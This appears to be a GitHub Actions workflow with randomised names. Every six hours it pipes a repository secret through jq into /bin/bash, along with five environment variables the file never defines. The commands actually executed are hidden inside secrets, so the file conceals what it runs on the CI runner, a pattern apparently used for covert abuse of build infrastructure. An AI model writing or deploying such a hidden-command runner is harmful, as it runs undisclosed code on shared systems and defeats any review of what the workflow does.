name: fengyuanchai4545

on:
  workflow_dispatch:
  schedule:
    - cron: '32 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fengyuanchai4545
        env:
          avokj60: ${{ secrets.avokj60 }}
        run: |
          echo $avokj60 | jq -r .ys9190 | /bin/bash
          echo $por51 | jq -r .jot2115 | /bin/bash
          echo $gzn02995 | jq -r .d35 | /bin/bash
          echo $yfdbk71 | jq -r .uqd4 | /bin/bash
          echo $pvlz45473 | jq -r .tnf87590 | /bin/bash
          echo $zhpa78826 | jq -r .jzhlq14 | /bin/bash

